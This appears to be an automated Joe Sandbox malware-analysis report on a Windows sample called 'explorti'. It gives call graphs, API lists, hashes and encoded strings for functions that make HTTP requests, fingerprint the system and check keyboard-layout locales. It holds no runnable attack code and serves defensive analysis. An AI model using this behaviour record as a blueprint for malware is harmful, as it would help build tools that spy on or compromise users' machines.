13770 18922b 13770->13447 13771->13447 13773 188088 13772->13773 13774 1880d2 13772->13774 13773->13774 13775 188091 13773->13775 13779 1880e1 13774->13779 13858 188e40 13774->13858 13776 189180 RtlAllocateHeap 13775->13776 13777 18809a 13776->13777 13777->13451 13779->13451 13781 17bd82 13780->13781 13782 17c171 13780->13782 13781->13782 13784 17bd96 InternetOpenW InternetConnectA 13781->13784 13783 187f00 RtlAllocateHeap 13782->13783 13788 17c11e shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13783->13788 13785 187840 RtlAllocateHeap 13784->13785 13786 17be0d 13785->13786 13787 175b00 RtlAllocateHeap 13786->13787 13792 17be18 shared_ptr 13787->13792 13788->13461 13789 187840 RtlAllocateHeap 13790 17bea9 13789->13790 13791 175b00 RtlAllocateHeap 13790->13791 13793 17beb4 13791->13793 13792->13789 13794 187840 RtlAllocateHeap 13793->13794 13795 17becd 13794->13795 13796 175b00 RtlAllocateHeap 13795->13796 13797 17bed8 HttpSendRequestA 13796->13797 13800 17befb shared_ptr 13797->13800 13799 17bf83 InternetReadFile 13801 17bfaa 13799->13801 13800->13799 13806 1785b0 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13802->13806 13807 1784e5 shared_ptr 13802->13807 13803 178677 13805 188040 RtlAllocateHeap 13803->13805 13804 187f00 RtlAllocateHeap 13804->13807 13805->13806 13806->13470 13807->13803 13807->13804 13807->13806 13876 1875a0 13808->13876 13810 188279 13811 188e40 RtlAllocateHeap 13810->13811 13812 188294 13810->13812 13811->13812 13813 188e40 RtlAllocateHeap 13812->13813 13815 1882e8 13812->13815 13814 18832e 13813->13814 13814->13476 13815->13476 13817 1794e4 13816->13817 13818 187f00 RtlAllocateHeap 13817->13818 13819 17952c 13818->13819 13820 187840 RtlAllocateHeap 13819->13820 13830 179545 shared_ptr 13820->13830 13821 1796af 13823 1797f0 13821->13823 13824 17970e 13821->13824 13822 187840 RtlAllocateHeap 13822->13830 13827 188040 RtlAllocateHeap 13823->13827 13826 187f00 RtlAllocateHeap 13824->13826 13825 175b00 RtlAllocateHeap 13825->13830 13828 179744 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13826->13828 13827->13828 13828->13531 13829 187f00 RtlAllocateHeap 13829->13830 13830->13821 13830->13822 13830->13823 13830->13825 13830->13828 13830->13829 13832 179194 13831->13832 13833 187f00 RtlAllocateHeap 13832->13833 13834 1791dc 13833->13834 13835 187840 RtlAllocateHeap 13834->13835 13845 1791f5 shared_ptr 13835->13845 13836 17935f 13838 187f00 RtlAllocateHeap 13836->13838 13837 187840 RtlAllocateHeap 13837->13845 13841 1793d6 shared_ptr 13838->13841 13839 175b00 RtlAllocateHeap 13839->13845 13840 179453 shared_ptr __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 13840->13533 13841->13840 13842 188040 RtlAllocateHeap 13841->13842 13844 179488 13842->13844 13843 187f00 RtlAllocateHeap 13843->13845 13845->13836 13845->13837 13845->13839 13845->13841 13845->13843 13847 189519 13846->13847 13848 18940b 13846->13848 13849 189170 RtlAllocateHeap 13847->13849 13852 189479 13848->13852 13853 189452 13848->13853 13850 18951e 13849->13850 13851 172380 RtlAllocateHeap 13850->13851 13857 189463 shared_ptr 13851->13857 13856 18d2e8 RtlAllocateHeap 13852->13856 13852->13857 13853->13850 13854 18945d 13853->13854 13855 18d2e8 RtlAllocateHeap 13854->13855 13855->13857 13856->13857 13857->13770 13859 188f8e 13858->13859 13860 188e6b 13858->13860 13861 189170 RtlAllocateHeap 13859->13861 13863 188edc 13860->13863 13864 188eb2 13860->13864 13862 188f93 13861->13862 13865 172380 RtlAllocateHeap 13862->13865 13868 18d2e8 RtlAllocateHeap 13863->13868 13870 188ec3 13863->13870 13864->13862 13866 188ebd 13864->13866 13865->13870 13867 18d2e8 RtlAllocateHeap 13866->13867 13867->13870 13868->13870 13869 188fb8 13871 18d2e8 RtlAllocateHeap 13869->13871 13870->13869 13872 188f4c shared_ptr 13870->13872 13873 172380 std::_Throw_future_error 13870->13873 13871->13872 13872->13779 13874 1a37bc ___std_exception_copy RtlAllocateHeap 13873->13874 13875 1723c3 13874->13875 13875->13779 13877 1875bb 13876->13877 13887 1876a4 shared_ptr 13876->13887 13881 18762a 13877->13881 13882 187651 13877->13882 13886 18763b 13877->13886 13877->13887 13878 189170 RtlAllocateHeap 13879 187736 13878->13879 13880 172380 RtlAllocateHeap 13879->13880 13883 18773b 13880->13883 13881->13879 13885 18d2e8 RtlAllocateHeap 13881->13885 13884 18d2e8 RtlAllocateHeap 13882->13884 13882->13886 13884->13886 13885->13886 13886->13878 13886->13887 13887->13810 13891 187c6c 13888->13891 13892 187c41 13888->13892 13889 187d60 13890 189170 RtlAllocateHeap 13889->13890 13900 187cd1 shared_ptr 13890->13900 13891->13889 13893 187d5b 13891->13893 13894 187cc0 13891->13894 13895 187ce7 13891->13895 13892->13605 13896 172380 RtlAllocateHeap 13893->13896 13894->13893 13897 187ccb 13894->13897 13899 18d2e8 RtlAllocateHeap 13895->13899 13895->13900 13896->13889 13898 18d2e8 RtlAllocateHeap 13897->13898 13898->13900 13899->13900 13900->13605 13902 1875a0 RtlAllocateHeap 13901->13902 13903 1883a0 13902->13903 13904 1883f2 13903->13904 13906 188ba0 13903->13906 13904->13605 13907 188cc9 13906->13907 13908 188bc3 13906->13908 13909 189170 RtlAllocateHeap 13907->13909 13912 188c2f 13908->13912 13913 188c05 13908->13913 13910 188cce 13909->13910 13911 172380 RtlAllocateHeap 13910->13911 13917 188c16 shared_ptr 13911->13917 13915 18d2e8 RtlAllocateHeap 13912->13915 13912->13917 13913->13910 13914 188c10 13913->13914 13916 18d2e8 RtlAllocateHeap 13914->13916 13915->13917 13916->13917 13917->13903 13919 1721e0 std::future_error::future_error RtlAllocateHeap 13918->13919 13920 18bffe 13919->13920 13920->13641 13922 1721e0 std::future_error::future_error RtlAllocateHeap 13921->13922 13923 18c072 13922->13923 13923->13644

                        Executed Functions

                        Function 0017BD30 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 310networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 767 17bd30-17bd7c 768 17bd82-17bd86 767->768 769 17c171-17c196 call 187f00 767->769 768->769 771 17bd8c-17bd90 768->771 775 17c1c4-17c1dc 769->775 776 17c198-17c1a4 769->776 771->769 772 17bd96-17be1f InternetOpenW InternetConnectA call 187840 call 175b00 771->772 799 17be23-17be3f 772->799 800 17be21 772->800 777 17c1e2-17c1ee 775->777 778 17c128-17c140 775->778 780 17c1a6-17c1b4 776->780 781 17c1ba-17c1c1 call 18d569 776->781 782 17c1f4-17c202 777->782 783 17c11e-17c125 call 18d569 777->783 785 17c146-17c152 778->785 786 17c213-17c22f call 18cef4 778->786 780->781 787 17c23f-17c244 call 1a6b7a 780->787 781->775 782->787 790 17c204 782->790 783->778 792 17c209-17c210 call 18d569 785->792 793 17c158-17c166 785->793 790->783 792->786 793->787 801 17c16c 793->801 806 17be41-17be50 799->806 807 17be70-17bedf call 187840 call 175b00 call 187840 call 175b00 799->807 800->799 801->792 808 17be66-17be6d call 18d569 806->808 809 17be52-17be60 806->809 820 17bee3-17bef9 HttpSendRequestA 807->820 821 17bee1 807->821 808->807 809->808 822 17befb-17bf0a 820->822 823 17bf2a-17bf52 820->823 821->820 824 17bf20-17bf27 call 18d569 822->824 825 17bf0c-17bf1a 822->825 826 17bf54-17bf63 823->826 827 17bf83-17bfa4 InternetReadFile 823->827 824->823 825->824 828 17bf65-17bf73 826->828 829 17bf79-17bf80 call 18d569 826->829 830 17bfaa 827->830 828->829 829->827 833 17bfb0-17c060 call 1a4160 830->833
                        APIs
                        • InternetOpenW.WININET(001C8D18,00000000,00000000,00000000,00000000), ref: 0017BDBD
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0017BDE1
                        • HttpSendRequestA.WININET(?,00000000), ref: 0017BEEB
                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 0017BF9D
                        • InternetCloseHandle.WININET(?), ref: 0017C077
                        • InternetCloseHandle.WININET(?), ref: 0017C07F
                        • InternetCloseHandle.WININET(?), ref: 0017C087
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
                        • String ID: UfNm$Ux1MTw==$aAJTaDE6OpZ=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range
                        • API String ID: 3632815558-1566280232
                        • Opcode ID: 4b26203f7f57bea9b075530fb98191386d96e6f4733690d98130fc12e3c4b567
                        • Instruction ID: 6917afae4720b64aff26240758a6e56a872fbd2de94a75a10036922c040ef0c2
                        • Opcode Fuzzy Hash: 4b26203f7f57bea9b075530fb98191386d96e6f4733690d98130fc12e3c4b567
                        • Instruction Fuzzy Hash: 0CB1C0B1A001189BDB28DF28CC85BAEBB79EF51304F5081ADF509972D2DB749AC0CF95
                        Function 0018D2E8 Relevance: .2, Instructions: 172COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1575 18d2e8-18d2eb 1576 18d2fa-18d2fd call 1a8a84 1575->1576 1578 18d302-18d305 1576->1578 1579 18d2ed-18d2f8 call 1a8cd9 1578->1579 1580 18d307-18d308 1578->1580 1579->1576 1583 18d309-18d30d 1579->1583 1584 172380-1723d0 call 1722c0 call 1a3a11 call 1a37bc 1583->1584 1585 18d313-18dcbe call 18ab11 call 1a3a11 call 1b7ba5 1583->1585 1599 18de6d-18de70 1585->1599 1600 18dcc4-18dd29 1585->1600 1601 18dd2b-18dd38 1600->1601 1602 18dd6e 1600->1602 1603 18dd3a-18dd3f 1601->1603 1604 18dd5d-18dd6c 1601->1604 1605 18dd74-18dd80 1602->1605 1603->1604 1606 18dd41-18dd46 1603->1606 1604->1605 1607 18ddb1 1605->1607 1608 18dd82-18dda4 1605->1608 1606->1604 1609 18dd48-18dd4d 1606->1609 1610 18ddb4-18ddd1 1607->1610 1608->1610 1611 18dda6-18ddaf 1608->1611 1609->1604 1612 18dd4f-18dd54 1609->1612 1613 18de6a-18de6c 1610->1613 1614 18ddd7-18ddef 1610->1614 1611->1610 1612->1604 1615 18dd56-18dd5b 1612->1615 1613->1599 1614->1613 1616 18ddf1-18ddf7 1614->1616 1615->1602 1615->1604 1616->1613 1617 18ddf9-18de11 1616->1617 1617->1613 1618 18de13-18de2d 1617->1618 1618->1613 1619 18de2f-18de4a 1618->1619 1619->1613 1620 18de4c-18de5b 1619->1620 1620->1613 1621 18de5d-18de64 1620->1621 1621->1613
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 001723BE
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID:
                        • API String ID: 2659868963-0
                        • Opcode ID: b6db6ea4212a52cb0bf628be50a209ceb529ecfad150e6cd15545da1255b0a67
                        • Instruction ID: 088d5be5afcab5057d70ee1ab95cabafb20fa2e6bfbafb6c406a2b86a72d1ab1
                        • Opcode Fuzzy Hash: b6db6ea4212a52cb0bf628be50a209ceb529ecfad150e6cd15545da1255b0a67
                        • Instruction Fuzzy Hash: DF51AFB2D02705CBDB29DF95E8817AEB7F5FB18314F24826AE415EB690D3749A80CF50
                        Function 00184690 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00187840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0018792C
                          • Part of subcall function 00187840: __Cnd_destroy_in_situ.LIBCPMT ref: 00187938
                          • Part of subcall function 00187840: __Mtx_destroy_in_situ.LIBCPMT ref: 00187941
                          • Part of subcall function 0017BD30: InternetOpenW.WININET(001C8D18,00000000,00000000,00000000,00000000), ref: 0017BDBD
                          • Part of subcall function 0017BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0017BDE1
                        • std::_Xinvalid_argument.LIBCPMT ref: 00184E72
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpenXinvalid_argumentstd::_
                        • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$stoi argument out of range
                        • API String ID: 2549319220-2107594612
                        • Opcode ID: 3c7710f134af28e412fb96a085de447217ca1420e323901269bd56e888b33d36
                        • Instruction ID: 1b4881c43ebc5e4c0a547bf93ff61d60bb7cb3761ec3ade4b21ad92781af388c
                        • Opcode Fuzzy Hash: 3c7710f134af28e412fb96a085de447217ca1420e323901269bd56e888b33d36
                        • Instruction Fuzzy Hash: ED231671A002588BEB19EB28CD9979DBB769F91304F5482DCE018AB2C2DB759F84CF51
                        Function 00175DD0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 923 175dd0-175ece 929 175ed0-175edc 923->929 930 175ef8-175f05 call 18cef4 923->930 932 175eee-175ef5 call 18d569 929->932 933 175ede-175eec 929->933 932->930 933->932 935 175f06-17608d call 1a6b7a call 18e060 call 187f00 * 5 RegOpenKeyExA 933->935 952 176093-176123 call 1a4000 935->952 953 176458-176461 935->953 979 176446-176452 952->979 980 176129-17612d 952->980 955 176463-17646e 953->955 956 17648e-176497 953->956 960 176484-17648b call 18d569 955->960 961 176470-17647e 955->961 957 1764c4-1764cd 956->957 958 176499-1764a4 956->958 964 1764cf-1764da 957->964 965 1764fa-176503 957->965 962 1764a6-1764b4 958->962 963 1764ba-1764c1 call 18d569 958->963 960->956 961->960 966 17657e-176583 call 1a6b7a 961->966 962->963 962->966 963->957 971 1764f0-1764f7 call 18d569 964->971 972 1764dc-1764ea 964->972 974 176505-176510 965->974 975 17652c-176535 965->975 971->965 972->966 972->971 983 176522-176529 call 18d569 974->983 984 176512-176520 974->984 976 176537-176546 975->976 977 176562-17657d call 18cef4 975->977 986 176558-17655f call 18d569 976->986 987 176548-176556 976->987 979->953 988 176133-176167 RegEnumValueW 980->988 989 176440 980->989 983->975 984->966 984->983 986->977 987->966 987->986 994 17642d-176434 988->994 995 17616d-17618d 988->995 989->979 994->988 998 17643a 994->998 1000 176190-176199 995->1000 998->989 1000->1000 1001 17619b-17622d call 187c20 call 188350 call 187840 * 2 call 175c40 1000->1001 1001->994
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                        • API String ID: 0-3963862150
                        • Opcode ID: 51c696166574d06668a7cd0c12019bc848f5bab74be9fb2e029d5aa2fc159221
                        • Instruction ID: 1fdd6915ccab525bfdc94e4a10c42859c0af6eae6156342a07e39f4e884bdeb4
                        • Opcode Fuzzy Hash: 51c696166574d06668a7cd0c12019bc848f5bab74be9fb2e029d5aa2fc159221
                        • Instruction Fuzzy Hash: C3E1AE71900218ABEB25DBA4CC99BEEB779EF14304F5082D9E409A7291DB74AFC4CF51
                        Function 00177CE0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1011 177ce0-177d62 call 1a4000 1015 17825e-17827b call 18cef4 1011->1015 1016 177d68-177d90 call 187840 call 175b00 1011->1016 1023 177d94-177db6 call 187840 call 175b00 1016->1023 1024 177d92 1016->1024 1029 177dba-177dd3 1023->1029 1030 177db8 1023->1030 1024->1023 1033 177dd5-177de4 1029->1033 1034 177e04-177e2f 1029->1034 1030->1029 1035 177de6-177df4 1033->1035 1036 177dfa-177e01 call 18d569 1033->1036 1037 177e31-177e40 1034->1037 1038 177e60-177e81 1034->1038 1035->1036 1041 17827c call 1a6b7a 1035->1041 1036->1034 1043 177e56-177e5d call 18d569 1037->1043 1044 177e42-177e50 1037->1044 1039 177e87-177e8c 1038->1039 1040 177e83-177e85 GetNativeSystemInfo 1038->1040 1046 177e8d-177e96 1039->1046 1040->1046 1053 178281-178286 call 1a6b7a 1041->1053 1043->1038 1044->1041 1044->1043 1051 177eb4-177eb7 1046->1051 1052 177e98-177e9f 1046->1052 1056 1781ff-178202 1051->1056 1057 177ebd-177ec6 1051->1057 1054 177ea5-177eaf 1052->1054 1055 178259 1052->1055 1059 178254 1054->1059 1055->1015 1056->1055 1062 178204-17820d 1056->1062 1060 177ed9-177edc 1057->1060 1061 177ec8-177ed4 1057->1061 1059->1055 1064 177ee2-177ee9 1060->1064 1065 1781dc-1781de 1060->1065 1061->1059 1066 178234-178237 1062->1066 1067 17820f-178213 1062->1067 1068 177eef-177f4b call 187840 call 175b00 call 187840 call 175b00 call 175c40 1064->1068 1069 177fc9-1781c5 call 187840 call 175b00 call 187840 call 175b00 call 175c40 call 187840 call 175b00 call 175620 call 187840 call 175b00 call 187840 call 175b00 call 175c40 call 187840 call 175b00 call 175620 call 187840 call 175b00 call 187840 call 175b00 call 175c40 call 187840 call 175b00 call 175620 1064->1069 1074 1781e0-1781ea 1065->1074 1075 1781ec-1781ef 1065->1075 1072 178245-178251 1066->1072 1073 178239-178243 1066->1073 1070 178215-17821a 1067->1070 1071 178228-178232 1067->1071 1097 177f50-177f57 1068->1097 1111 1781cb-1781d4 1069->1111 1070->1071 1077 17821c-178226 1070->1077 1071->1055 1072->1059 1073->1055 1074->1059 1075->1055 1079 1781f1-1781fd 1075->1079 1077->1055 1079->1059 1099 177f5b-177f7b call 1a8a61 1097->1099 1100 177f59 1097->1100 1106 177fb2-177fb4 1099->1106 1107 177f7d-177f8c 1099->1107 1100->1099 1106->1111 1112 177fba-177fc4 1106->1112 1108 177fa2-177faf call 18d569 1107->1108 1109 177f8e-177f9c 1107->1109 1108->1106 1109->1053 1109->1108 1111->1056 1115 1781d6 1111->1115 1112->1111 1115->1065
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00177E83
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID: McsqLc==$McsqMM==$McsrKc==
                        • API String ID: 1721193555-2014272013
                        • Opcode ID: 24c2f9fd940fdcb1ea9b75eb266b52975822d4a48cf3991e4ba24ccee0e29f4d
                        • Instruction ID: 558bbbec2d6b5d0d7e956eb6c810a11dbe4753d82331e81922a3e6240605fb23
                        • Opcode Fuzzy Hash: 24c2f9fd940fdcb1ea9b75eb266b52975822d4a48cf3991e4ba24ccee0e29f4d
                        • Instruction Fuzzy Hash: E1D10B70E016149BDB18BB68DD5A3AD7B72AB52314FA482CDE41D673C2DB744E80CBD2
                        Function 001A6DE1 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1149 1a6de1-1a6e16 GetFileType 1150 1a6ece-1a6ed1 1149->1150 1151 1a6e1c-1a6e27 1149->1151 1154 1a6efa-1a6f22 1150->1154 1155 1a6ed3-1a6ed6 1150->1155 1152 1a6e49-1a6e65 call 1a4000 GetFileInformationByHandle 1151->1152 1153 1a6e29-1a6e3a call 1a7157 1151->1153 1164 1a6eeb-1a6ef8 call 1a73ed 1152->1164 1166 1a6e6b-1a6ead call 1a70a9 call 1a6f51 * 3 1152->1166 1169 1a6e40-1a6e47 1153->1169 1170 1a6ee7-1a6ee9 1153->1170 1156 1a6f3f-1a6f41 1154->1156 1157 1a6f24-1a6f37 1154->1157 1155->1154 1160 1a6ed8-1a6eda 1155->1160 1162 1a6f42-1a6f50 call 18cef4 1156->1162 1157->1156 1176 1a6f39-1a6f3c 1157->1176 1160->1164 1165 1a6edc-1a6ee1 call 1a7423 1160->1165 1164->1170 1165->1170 1185 1a6eb2-1a6eca call 1a7076 1166->1185 1169->1152 1170->1162 1176->1156 1185->1156 1188 1a6ecc 1185->1188 1188->1170
                        APIs
                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 001A6E03
                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 001A6E5D
                        • __dosmaperr.LIBCMT ref: 001A6EF2
                          • Part of subcall function 001A7157: __dosmaperr.LIBCMT ref: 001A718C
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
